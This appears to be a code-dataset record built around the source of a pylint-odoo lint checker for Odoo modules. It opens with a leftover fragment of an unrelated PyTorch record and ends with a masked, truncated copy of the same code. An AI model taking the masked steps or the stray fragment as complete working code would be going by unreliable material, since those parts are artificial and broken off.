idx_to_desc\n\n# Literal Speaker data function - hi r u ok\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)\n output.append([color, utt])\n\n return output # [referent, utterance_idx]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Visit module to add odoo checks
"""
import os
import re
import astroid
import isort
from pylint.checkers import utils
from six import string_types
from .. import misc, settings
ODOO_MSGS = {
# C->convention R->refactor W->warning E->error F->fatal
# Visit odoo module with settings.BASE_OMODULE_ID
'C%d02' % settings.BASE_OMODULE_ID: (
'Missing ./README.rst file. Template here: %s',
'missing-readme',
settings.DESC_DFLT
),
'E%d01' % settings.BASE_OMODULE_ID: (
'%s %s',
'rst-syntax-error',
settings.DESC_DFLT
),
'E%d02' % settings.BASE_OMODULE_ID: (
'%s error: %s',
'xml-syntax-error',
settings.DESC_DFLT
),
'W%d01' % settings.BASE_OMODULE_ID: (
'%s Dangerous filter without explicit `user_id` in xml_id %s',
'dangerous-filter-wo-user',
settings.DESC_DFLT
),
'W%d02' % settings.BASE_OMODULE_ID: (
'%s Duplicate xml record id "%s" in %s',
'duplicate-xml-record-id',
settings.DESC_DFLT
),
'W%d03' % settings.BASE_OMODULE_ID: (
'%s',
'javascript-lint',
settings.DESC_DFLT
),
'W%d04' % settings.BASE_OMODULE_ID: (
'%s Deprecated <openerp> xml node',
'deprecated-openerp-xml-node',
settings.DESC_DFLT
),
'W%d05' % settings.BASE_OMODULE_ID: (
'%s record res.users without '
'context="{\'no_reset_password\': True}"',
'create-user-wo-reset-password',
settings.DESC_DFLT
),
'W%d06' % settings.BASE_OMODULE_ID: (
'%s Duplicate id "%s"',
'duplicate-id-csv',
settings.DESC_DFLT
),
'W%d07' % settings.BASE_OMODULE_ID: (
'%s Duplicate xml field "%s" in lines %s',
'duplicate-xml-fields',
settings.DESC_DFLT
),
'W%d08' % settings.BASE_OMODULE_ID: (
'%s Missing newline',
'missing-newline-extrafiles',
settings.DESC_DFLT
),
'W%d09' % settings.BASE_OMODULE_ID: (
'%s Redundant name module reference in xml_ids "%s".',
'redundant-modulename-xml',
settings.DESC_DFLT
),
'W%d10' % settings.BASE_OMODULE_ID: (
'%s Use wrong tabs indentation instead of four spaces',
'wrong-tabs-instead-of-spaces',
settings.DESC_DFLT
),
'R%d80' % settings.BASE_OMODULE_ID: (
'Consider merging classes inherited to "%s" from %s.',
'consider-merging-classes-inherited',
settings.DESC_DFLT
),
'W%d50' % settings.BASE_OMODULE_ID: (
'Same Odoo module absolute import. You should use '
'relative import with "." '
'instead of "openerp.addons.%s"',
'odoo-addons-relative-import',
settings.DESC_DFLT
),
'W%d40' % settings.BASE_OMODULE_ID: (
'%s Dangerous use of "replace" from view '
'with priority %s < %s. '
'Increase priority or don\'t use "replace". '
'For more information see https://odoo-development.readthedocs.io/en/latest/dev/xml/inherit.html#collisions-and-priority ',
'dangerous-view-replace-wo-priority',
settings.DESC_DFLT
),
'W%d30' % settings.BASE_OMODULE_ID: (
'%s not used from manifest',
'file-not-used',
settings.DESC_DFLT
),
'W%d35' % settings.BASE_OMODULE_ID: (
'External dependency "%s" without ImportError. More info: '
'https://odoo-development.readthedocs.io/en/latest/dev/py/external-imports.html'
'#external-dependencies',
'missing-import-error',
settings.DESC_DFLT
),
'W%d36' % settings.BASE_OMODULE_ID: (
'Missing external dependency "%s" from manifest. More info: '
'https://github.com/OCA/odoo-community.org/blob/master/website/'
'Contribution/CONTRIBUTING.rst'
'#external-dependencies',
'missing-manifest-dependency',
settings.DESC_DFLT
),
'W%d38' % settings.BASE_OMODULE_ID: (
'pass into block except. '
'If you really need to use the pass consider logging that exception',
'except-pass',
settings.DESC_DFLT
),
'W%d37' % settings.BASE_OMODULE_ID: (
'%s The xml attribute is missing the translation="off" tag %s',
'xml-attribute-translatable',
settings.DESC_DFLT
),
'W%d42' % settings.BASE_OMODULE_ID: (
'%s Deprecated <tree> xml attribute "%s"',
'xml-deprecated-tree-attribute',
settings.DESC_DFLT
),
'W%d43' % settings.BASE_OMODULE_ID: (
'%s Deprecated QWeb directive "%s". Use "t-options" instead',
'xml-deprecated-qweb-directive',
settings.DESC_DFLT
),
'W%d39' % settings.BASE_OMODULE_ID: (
'%s Use <odoo> instead of <odoo><data> or use <odoo noupdate="1">'
'instead of <odoo><data noupdate="1">',
'deprecated-data-xml-node',
settings.DESC_DFLT
),
'W%d44' % settings.BASE_OMODULE_ID: (
'%s The resource in in src/href contains a not valid chararter',
'character-not-valid-in-resource-link',
settings.DESC_DFLT
),
}
DFTL_README_TMPL_URL = 'https://github.com/OCA/maintainer-tools' + \
'/blob/master/template/module/README.rst'
DFTL_README_FILES = ['README.rst', 'README.md', 'README.txt']
DFTL_MIN_PRIORITY = 99
# Files supported from manifest to convert
# Extracted from openerp/tools/convert.py:def convert_file
DFLT_EXTFILES_CONVERT = ['csv', 'sql', 'xml', 'yml']
DFLT_EXTFILES_TO_LINT = DFLT_EXTFILES_CONVERT + [
'po', 'js', 'mako', 'rst', 'md', 'markdown']
DFLT_IMPORT_NAME_WHITELIST = [
# self-odoo
'odoo', 'openerp',
# packages for unit tests only
'requests_mock',
# Known external packages of odoo
'PIL', 'anybox.testing.openerp', 'argparse', 'babel',
'dateutil', 'decorator', 'docutils', 'faces', 'feedparser',
'gdata', 'gevent', 'greenlet', 'jcconv', 'jinja2',
'ldap', 'lxml', 'mako', 'markupsafe', 'mock', 'odf',
'ofxparse', 'openid', 'passlib', 'pkg_resources',
'psutil', 'psycogreen', 'psycopg2', 'pyPdf', 'pychart',
'pydot', 'pyparsing', 'pytz', 'qrcode', 'reportlab',
'requests', 'serial', 'simplejson', 'six', 'suds',
'unittest2', 'usb', 'vatnumber', 'vobject', 'werkzeug',
'wsgiref', 'xlsxwriter', 'xlwt', 'yaml',
]
DFTL_JSLINTRC = os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'examples', '.jslintrc'
)
DFLT_DEPRECATED_TREE_ATTRS = ['colors', 'fonts', 'string']
DFTL_MANIFEST_DATA_KEYS = ['data', 'demo', 'demo_xml', 'init_xml', 'test',
'update_xml']
class ModuleChecker(misc.WrapperModuleChecker):
name = settings.CFG_SECTION
msgs = ODOO_MSGS
options = (
('readme_template_url', {
'type': 'string',
'metavar': '<string>',
'default': DFTL_README_TMPL_URL,
'help': 'URL of README.rst template file',
}),
('extfiles_to_lint', {
'type': 'csv',
'metavar': '<comma separated values>',
'default': DFLT_EXTFILES_TO_LINT,
'help': 'List of extension files to check separated by a comma.'
}),
('min-priority', {
'type': 'int',
'metavar': '<int>',
'default': DFTL_MIN_PRIORITY,
'help': 'Minimum priority number of a view with replace of fields.'
}),
('extfiles_convert', {
'type': 'csv',
'metavar': '<comma separated values>',
'default': DFLT_EXTFILES_CONVERT,
'help': 'List of extension files supported to convert '
'from manifest separated by a comma.'
}),
('import_name_whitelist', {
'type': 'csv',
'metavar': '<comma separated values>',
'default': DFLT_IMPORT_NAME_WHITELIST,
'help': 'List of known import dependencies of odoo,'
' separated by a comma.'
}),
('jslintrc', {
'type': 'string',
'metavar': '<path to file>',
'default': os.environ.get('PYLINT_ODOO_JSLINTRC') or DFTL_JSLINTRC,
'help': ('A path to a file that contains a configuration file of '
'javascript lint. You can use the environment variable '
'"PYLINT_ODOO_JSLINTRC" too. Default: %s' % DFTL_JSLINTRC)
}),
('deprecated_tree_attributes', {
'type': 'multiple_choice',
'metavar': '<attributes>',
'default': DFLT_DEPRECATED_TREE_ATTRS,
'choices': DFLT_DEPRECATED_TREE_ATTRS,
'help': 'List of deprecated list view attributes,'
' separated by a comma. Valid values: %s' % ', '.join(
DFLT_DEPRECATED_TREE_ATTRS)
}),
)
odoo_check_versions = {
'missing-import-error': {
'max_odoo_version': '11.0',
},
}
class_inherit_names = []
@utils.check_messages('consider-merging-classes-inherited')
def visit_assign(self, node):
if not self.odoo_node:
return
if not self.linter.is_message_enabled(
'consider-merging-classes-inherited', node.lineno):
return
node_left = node.targets[0]
if not isinstance(node_left, astroid.node_classes.AssignName) or \
node_left.name not in ('_inherit', '_name') or \
not isinstance(node.value, astroid.node_classes.Const) or \
not isinstance(node.parent, astroid.ClassDef):
return
if node_left.name == '_name':
node.parent.odoo_attribute_name = node.value.value
return
_name = getattr(node.parent, 'odoo_attribute_name', None)
_inherit = node.value.value
if _name and _name != _inherit:
# Skip _name='model.name' _inherit='other.model' because is valid
return
key = (self.odoo_node, _inherit)
node.file = self.linter.current_file
self.inh_dup.setdefault(key, []).append(node)
def _build_whitelist_module_patterns(self):
known_patterns = []
for known_pattern in self.config.import_name_whitelist:
pattern = known_pattern.replace('*', '.*').replace('?', '.?')
known_patterns.append(re.compile('^' + pattern + '$'))
return known_patterns
def open(self):
"""Define variables to use cache"""
self.inh_dup = {}
patterns = self._build_whitelist_module_patterns()
self._whitelist_module_patterns = patterns
super(ModuleChecker, self).open()
def close(self):
"""Final process get all cached values and add messages"""
for (odoo_node, class_dup_name), nodes in self.inh_dup.items():
if len(nodes) == 1:
continue
path_nodes = []
for node in nodes[1:]:
relpath = os.path.relpath(node.file,
os.path.dirname(odoo_node.file))
path_nodes.append("%s:%d" % (relpath, node.lineno))
self.add_message('consider-merging-classes-inherited',
node=nodes[0],
args=(class_dup_name, ', '.join(path_nodes)))
def _get_odoo_module_imported(self, node):
odoo_module = []
if isinstance(node, astroid.ImportFrom) and \
('openerp.addons' in node.modname or
'odoo.addons' in node.modname):
packages = node.modname.split('.')
if len(packages) >= 3:
# from openerp.addons.odoo_module import models
odoo_module.append(packages[2])
else:
# from openerp.addons import odoo_module
odoo_module.append(node.names[0][0])
elif isinstance(node, astroid.Import):
for name, _ in node.names:
if 'openerp.addons' not in name and 'odoo.addons' not in name:
continue
packages = name.split('.')
if len(packages) >= 3:
# import openerp.addons.odoo_module
odoo_module.append(packages[2])
return odoo_module
def check_odoo_relative_import(self, node):
if self.odoo_module_name in self._get_odoo_module_imported(node):
self.add_message('odoo-addons-relative-import', node=node,
args=(self.odoo_module_name))
@staticmethod
def _is_absolute_import(node, name):
modnode = node.root()
importedmodnode = ModuleChecker._get_imported_module(node, name)
if importedmodnode and importedmodnode.file and \
modnode is not importedmodnode and \
importedmodnode.name != name:
return True
return False
@staticmethod
def _get_imported_module(importnode, modname):
try:
return importnode.do_import_module(modname)
except:
pass
def _is_module_name_in_whitelist(self, module_name):
# Try to find most specific placement instruction match (if any)
# (from isort place_module() method)
parts = module_name.split('.')
module_names_to_check = [
'.'.join(parts[:first_k])
for first_k in range(len(parts), 0, -1)
]
# Check if one of the module name is part of the whitelist.
# For an module name such as 'anybox.testing.openerp', the
# modules names to check will be:
# ['anybox.testing.openerp', 'anybox.testing', 'anybox']
# Only one of them has to be in the whitelist to be accepted.
for module_name_to_check in module_names_to_check:
for pattern in self._whitelist_module_patterns:
if pattern.match(module_name_to_check):
return True
return False
def _check_imported_packages(self, node, module_name):
"""Check if the import node is a external dependency to validate it"""
if not module_name:
# skip local packages because is not a external dependency.
return
if not self.manifest_dict:
# skip if is not a module of odoo
return
if not isinstance(node.parent, astroid.Module):
# skip nested import sentences
return
if self._is_absolute_import(node, module_name):
# skip absolute imports
return
if self._is_module_name_in_whitelist(module_name):
# ignore whitelisted modules
return
isort_obj = isort.SortImports(file_contents='')
import_category = isort_obj.place_module(module_name)
if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):
# skip if is not a external library or is a white list library
return
relpath = os.path.relpath(
node.parent.file, os.path.dirname(self.manifest_file))
if os.path.dirname(relpath) == 'tests':
# import errors rules don't apply to the test files
# since these files are loaded only when running tests
# and in such a case your
# module and their external dependencies are installed.
return
self.add_message('missing-import-error', node=node,
args=(module_name,))
ext_deps = self.manifest_dict.get('external_dependencies') or {}
py_ext_deps = ext_deps.get('python') or []
if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:
return
if module_name not in py_ext_deps and \
module_name.split('.')[0] not in py_ext_deps:
self.add_message('missing-manifest-dependency', node=node,
args=(module_name,))
@utils.check_messages('odoo-addons-relative-import',
'missing-import-error',
'missing-manifest-dependency')
def visit_importfrom(self, node):
self.check_odoo_relative_import(node)
if isinstance(node.scope(), astroid.Module):
package = node.modname
self._check_imported_packages(node, package)
@utils.check_messages('odoo-addons-relative-import',
'missing-import-error',
'missing-manifest-dependency')
def visit_import(self, node):
self.check_odoo_relative_import(node)
for name, _ in node.names:
if isinstance(node.scope(), astroid.Module):
self._check_imported_packages(node, name)
@utils.check_messages('except-pass')
def visit_tryexcept(self, node):
"""Visit block try except"""
for handler in node.handlers:
if (not handler.name and
len(handler.body) == 1 and
isinstance(handler.body[0], astroid.node_classes.Pass)):
self.add_message('except-pass', node=handler)
def _check_rst_syntax_error(self):
"""Check if rst file there is syntax error
:return: False if exists errors and
add list of errors in self.msg_args
"""
rst_files = self.filter_files_ext('rst')
self.msg_args = []
for rst_file in rst_files:
errors = self.check_rst_syntax(
os.path.join(self.module_path, rst_file))
for error in errors:
msg = error.full_message
res = re.search(
r'No directive entry for "([\w|\-]+)"|'
r'Unknown directive type "([\w|\-]+)"|'
r'No role entry for "([\w|\-]+)"|'
r'Unknown interpreted text role "([\w|\-]+)"', msg)
# TODO: Add support for sphinx directives after fix
# https://github.com/twolfson/restructuredtext-lint/issues/29
if res:
# Skip directive errors
continue
self.msg_args.append((
"%s:%d" % (rst_file, error.line or 0),
msg.strip('\n').replace('\n', '|')))
if self.msg_args:
return False
return True
def _check_missing_readme(self):
"""Check if exists ./README.{rst,md,txt} file
:return: If exists return True else False
"""
self.msg_args = (self.config.readme_template_url,)
for readme in DFTL_README_FILES:
if os.path.isfile(os.path.join(self.module_path, readme)):
return True
return False
def _check_xml_syntax_error(self):
"""Check if xml file there is syntax error
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=True):
result = self.parse_xml(os.path.join(self.module_path, xml_file))
if isinstance(result, string_types):
self.msg_args.append((
xml_file, result.strip('\n').replace('\n', '|')))
if self.msg_args:
return False
return True
def _get_duplicate_xml_record_id(self, records):
"""Get duplicated records based on attribute id
:param records list: List of lxml.etree.Element "<record"
:return: Duplicated items.
e.g. {record.id: [record_node1, record_node2]}
:rtype: dict
"""
all_records = {}
for record in records:
record_id = "%s/%s_noupdate_%s" % (
record.attrib.get('section', ''),
record.attrib.get('id', ''),
record.getparent().attrib.get('noupdate', '0'),
)
all_records.setdefault(record_id, []).append(record)
# Remove all keys which not duplicated
records = {}
for key, items in all_records.items():
if not len(items) < 2:
records[key] = items
return records
def _check_duplicate_xml_record_id(self):
"""Check duplicated XML-IDs inside of the files of
each manifest-section treated them separately
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
xml_records = []
for fname, section in self._get_manifest_referenced_files().items():
if os.path.splitext(fname)[1].lower() != '.xml':
continue
fname = os.path.join(self.module_path, fname)
for xml_record in self.get_xml_records(fname):
xml_record.attrib['section'] = section
xml_records.append(xml_record)
for name, fobjs in \
self._get_duplicate_xml_record_id(xml_records).items():
self.msg_args.append((
"%s:%d" % (os.path.relpath(fobjs[0].base, self.module_path),
fobjs[0].sourceline),
name,
', '.join([os.path.relpath(fobj.base, self.module_path) +
':' + str(fobj.sourceline)
for fobj in fobjs[1:]]),
))
if self.msg_args:
return False
return True
def _check_duplicate_id_csv(self):
"""Check duplicate xml id in ir.model.access.csv files of a odoo module.
:return: False if exists errors and
add list of errors in self.msg_args
"""
all_csv_ids = []
self.msg_args = []
for csv_file_rel in self.filter_files_ext('csv', relpath=True):
csv_file = os.path.join(self.module_path, csv_file_rel)
if os.path.basename(csv_file) == 'ir.model.access.csv':
all_csv_ids.extend(self.get_field_csv(csv_file))
duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)
for duplicated_id_csv in duplicated_ids_csv:
self.msg_args.append((csv_file_rel, duplicated_id_csv))
if duplicated_ids_csv:
return False
return True
def _check_redundant_modulename_xml(self):
"""Check redundant module name in xml file.
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for xml_file_rel in self.filter_files_ext('xml', relpath=True):
xml_file = os.path.join(self.module_path, xml_file_rel)
for xml_id, lineno in self.get_xml_redundant_module_name(
xml_file, self.module):
self.msg_args.append(
("%s:%d" % (xml_file_rel, lineno), xml_id))
if self.msg_args:
return False
return True
def _check_character_not_valid_in_resource_link(self):
"""The resource in in src/href contains a not valid chararter"""
self.msg_args = []
for xml_file in self.filter_files_ext('xml'):
doc = self.parse_xml(os.path.join(self.module_path, xml_file))
for name, attr in (('link', 'href'), ('script', 'src')):
nodes = (doc.xpath('.//%s[@%s]' % (name, attr))
if not isinstance(doc, string_types) else [])
for node in nodes:
resource = node.get(attr, '')
ext = os.path.splitext(os.path.basename(resource))[1]
if (resource.startswith('/') and not
re.search('^[.][a-zA-Z]+$', ext)):
self.msg_args.append(("%s:%s" % (xml_file,
node.sourceline)))
if self.msg_args:
return False
return True
def _get_duplicate_xml_fields(self, fields):
"""Get duplicated xml fields based on attribute name
:param fields list: List of lxml.etree.Element "<field"
:return: Duplicated items.
e.g. {field.name: [field_node1, field_node2]}
:rtype: dict
"""
all_fields = {}
for field in fields:
field_xml = field.attrib.get('name')
if not field_xml:
continue
all_fields.setdefault(
(field_xml, field.attrib.get('context'),
field.attrib.get('filter_domain'),
field.getparent()), []).append(field)
# Remove all keys which not duplicated by excluding them from the
return dict(((name, context, filter_domain, parent_node), nodes) for
(name, context, filter_domain, parent_node), nodes in
all_fields.items() if len(nodes) >= 2)
def _check_duplicate_xml_fields(self):
"""Check duplicate field in all record of xml files of a odoo module.
Important note: this check does not work with inherited views.
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=True):
for record in self.get_xml_records(
os.path.join(self.module_path, xml_file)):
if record.xpath('field[@name="inherit_id"]'):
continue
for xpath in ['field', 'field/*/field',
'field/*/field/tree/field',
'field/*/field/form/field']:
for name, fobjs in self._get_duplicate_xml_fields(
record.xpath(xpath)).items():
self.msg_args.append((
"%s:%d" % (xml_file, fobjs[0].sourceline), name[0],
', '.join([str(fobj.sourceline)
for fobj in fobjs[1:]]),
))
if self.msg_args:
return False
return True
def _check_dangerous_filter_wo_user(self):
"""Check dangerous filter without a user assigned.
:return: False if exists errors and
add list of errors in self.msg_args
"""
xml_files = self.filter_files_ext('xml')
for xml_file in xml_files:
ir_filter_records = self.get_xml_records(
os.path.join(self.module_path, xml_file), model='ir.filters')
for ir_filter_record in ir_filter_records:
ir_filter_fields = ir_filter_record.xpath(
"field[@name='name' or @name='user_id']")
# if exists field="name" then is a new record
# then should be field="user_id" too
if ir_filter_fields and len(ir_filter_fields) == 1:
# TODO: Add a list of msg_args before of return
# TODO: Add source lineno in all xml checks
self.msg_args = (
"%s:%d" % (xml_file, ir_filter_record.sourceline),
ir_filter_record.get('id'),)
return False
return True
@staticmethod
def _get_priority(view):
try:
priority_node = view.xpath("field[@name='priority'][1]")[0]
return int(priority_node.get('eval', priority_node.text) or 0)
except (IndexError, ValueError):
# IndexError: If the field is not found
# ValueError: If the value found is not valid integer
pass
return 0
@staticmethod
def _is_replaced_field(view):
try:
arch = view.xpath("field[@name='arch' and @type='xml'][1]")[0]
except IndexError:
return None
replaces = \
arch.xpath(".//field[@name='name' and @position='replace'][1]") + \
arch.xpath(".//xpath[@position='replace'][1]")
return bool(replaces)
def _check_dangerous_view_replace_wo_priority(self):
"""Check dangerous view defined with low priority
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
xml_files = self.filter_files_ext('xml')
for xml_file in xml_files:
views = self.get_xml_records(
os.path.join(self.module_path, xml_file), model='ir.ui.view')
for view in views:
priority = self._get_priority(view)
is_replaced_field = self._is_replaced_field(view)
if is_replaced_field and priority < self.config.min_priority:
self.msg_args.append((
"%s:%s" % (xml_file, view.sourceline), priority,
self.config.min_priority))
if self.msg_args:
return False
return True
def _check_create_user_wo_reset_password(self):
"""Check xml records of user without the context
'context="{'no_reset_password': True}"'
This context avoid send email and mail log warning
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
xml_files = self.filter_files_ext('xml')
for xml_file in xml_files:
user_records = self.get_xml_records(
os.path.join(self.module_path, xml_file), model='res.users')
# if exists field="name" then is a new record
# then should be context
self.msg_args.extend([
("%s:%s" % (xml_file, user_record.sourceline))
for user_record in user_records
if user_record.xpath("field[@name='name']") and
'no_reset_password' not in (user_record.get('context') or '')])
if self.msg_args:
return False
return True
def _check_javascript_lint(self):
"""Check javascript lint
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for js_file_rel in self.filter_files_ext('js', relpath=True):
js_file = os.path.join(self.module_path, js_file_rel)
errors = self.check_js_lint(js_file, self.config.jslintrc)
for error in errors:
self.msg_args.append((js_file_rel + error,))
if self.msg_args:
return False
return True
def _check_deprecated_data_xml_node(self):
"""Check deprecated <data> xml node inside <odoo> xml node
:return: False if found <data> xml node inside <odoo> xml node"""
xml_files = self.filter_files_ext('xml')
self.msg_args = []
for xml_file in xml_files:
doc = self.parse_xml(os.path.join(self.module_path, xml_file))
odoo_nodes = doc.xpath("/odoo") \
if not isinstance(doc, string_types) else []
children, data_node = ((odoo_nodes[0].getchildren(),
odoo_nodes[0].findall('data'))
if odoo_nodes else ([], []))
if len(children) == 1 and len(data_node) == 1:
lineno = odoo_nodes[0].sourceline
self.msg_args.append(("%s:%s" % (xml_file, lineno)))
if self.msg_args:
return False
return True
def _check_deprecated_openerp_xml_node(self):
"""Check deprecated <openerp> xml node
:return: False if exists <openerp> node and
add list of xml files in self.msg_args
"""
xml_files = self.filter_files_ext('xml')
self.msg_args = []
for xml_file in xml_files:
doc = self.parse_xml(os.path.join(self.module_path, xml_file))
openerp_nodes = doc.xpath("/openerp") \
if not isinstance(doc, string_types) else []
if openerp_nodes:
lineno = openerp_nodes[0].sourceline
self.msg_args.append(("%s:%s" % (xml_file, lineno)))
if self.msg_args:
return False
return True
def _check_wrong_tabs_instead_of_spaces(self):
"""Check wrong tabs character instead of four spaces.
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for type_file in self.config.extfiles_to_lint:
for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
ext_file = os.path.join(self.module_path, ext_file_rel)
countline = 0
with open(ext_file, 'rb') as fp:
for line in fp:
countline += 1
line_space_trip = line.lstrip(b' ')
if line_space_trip != line_space_trip.lstrip(b'\t'):
self.msg_args.append(
("%s:%d" % (ext_file_rel, countline)))
if self.msg_args:
return False
return True
def _check_missing_newline_extrafiles(self):
"""Check missing newline in other ext files (.xml, .csv, .po)
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for type_file in self.config.extfiles_to_lint:
for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
ext_file = os.path.join(self.module_path, ext_file_rel)
last_line = ''
# NOTE: SEEK_END just is supported with 'rb' mode for py3
with open(ext_file, 'rb') as fp:
if os.stat(ext_file).st_size > 1:
fp.seek(-2, os.SEEK_END)
last_line = fp.readline()
if not (last_line.endswith(b'\n') or
last_line.endswith(b'\r')):
self.msg_args.append((ext_file_rel,))
if self.msg_args:
return False
return True
def _get_manifest_referenced_files(self):
referenced_files = {}
for data_type in DFTL_MANIFEST_DATA_KEYS:
for fname in self.manifest_dict.get(data_type) or []:
referenced_files[fname] = data_type
return referenced_files
def _get_xml_referenced_files(self):
referenced_files = {}
for data_type in DFTL_MANIFEST_DATA_KEYS:
for fname in self.manifest_dict.get(data_type) or []:
if not fname.endswith('.xml'):
continue
referenced_files.update(
self._get_xml_referenced_files_report(fname, data_type)
)
return referenced_files
def _get_xml_referenced_files_report(self, fname, data_type):
return {
# those files are relative to the addon path
os.path.join(
*record.attrib[attribute].split(os.sep)[1:]
): data_type
for attribute in ['xml', 'xsl']
for record in self.parse_xml(
os.path.join(self.module_path, fname)
)
.xpath('//report[@%s]' % attribute)
}
def _get_module_files(self):
module_files = []
for type_file in self.config.extfiles_convert:
for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
module_files.append(ext_file_rel)
return module_files
def _check_file_not_used(self):
"""Check if a file is not used from manifest"""
module_files = set(self._get_module_files())
referenced_files = set(self._get_manifest_referenced_files()).union(
set(self._get_xml_referenced_files())
)
excluded_dirs = ['static', 'test', 'tests', 'migrations']
no_referenced_files = [
f for f in (module_files - referenced_files)
if f.split(os.path.sep)[0] not in excluded_dirs
]
self.msg_args = no_referenced_files
return not no_referenced_files
def _check_xml_attribute_translatable(self):
"""The xml attribute is missing the translation="off" tag
Example <attribute name="groups">sale.group</attribute>
"""
if (self.linter._all_options['valid_odoo_versions'].config
.valid_odoo_versions != ['8.0']):
return True
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=True):
for record in self.get_xml_records(
os.path.join(self.module_path, xml_file), None,
'//attribute[not(@name="string") and not(@translation)]'):
self.msg_args.append(
("%s:%d" % (xml_file, record.sourceline), 'xml_id'))
if self.msg_args:
return False
return True
def _check_xml_deprecated_tree_attribute(self):
"""The tree-view declaration is using a deprecated attribute.
Example <tree string="Partners"></tree>
"""
checks = [
{
'attr': 'colors',
'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},
'xpath': './/tree[@colors]',
},
{
'attr': 'fonts',
'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},
'xpath': './/tree[@fonts]',
},
{
'attr': 'string',
'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'},
'xpath': './/tree[@string]',
},
]
valid_versions = set(
self.linter._all_options['valid_odoo_versions'].config
.valid_odoo_versions)
applicable_checks = [check for check in checks if (
check['attr'] in self.config.deprecated_tree_attributes and
bool(valid_versions - check['skip_versions']))]
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=True):
for record in self.get_xml_records(
os.path.join(self.module_path, xml_file),
model='ir.ui.view'):
for check in applicable_checks:
if record.xpath(check['xpath']):
self.msg_args.append((
'%s:%d' % (xml_file, record.sourceline),
check['attr']))
if self.msg_args:
return False
return True
def _check_xml_deprecated_qweb_directive(self):
"""Check for use of deprecated QWeb directives t-*-options.
:return: False if deprecated directives are found, in which case
self.msg_args will contain the error messages.
"""
valid_versions = set(self.linter._all_options[
'valid_odoo_versions'].config.valid_odoo_versions)
if not valid_versions & {'10.0', '11.0'}:
return True
deprecated_directives = {
't-esc-options',
't-field-options',
't-raw-options',
}
directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)
xpath = '|'.join(
'/%s//template//*[%s]' % (tag, directive_attrs)
for tag in ('odoo', 'openerp')
)
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=False):
doc = self.parse_xml(xml_file)
if isinstance(doc, string_types):
continue
for node in doc.xpath(xpath):
# Find which directive was used exactly.
directive = next(
iter(set(node.attrib) & deprecated_directives))
self.msg_args.append((
'%s:%d' % (xml_file, node.sourceline), directive))
return not bool(self.msg_args)
|
normal
|
{
"blob_id": "9f34f94422f4847859e9111f34ade2e1274cb543",
"index": 8775,
"step-1": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n <mask token>\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n <mask token>\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = 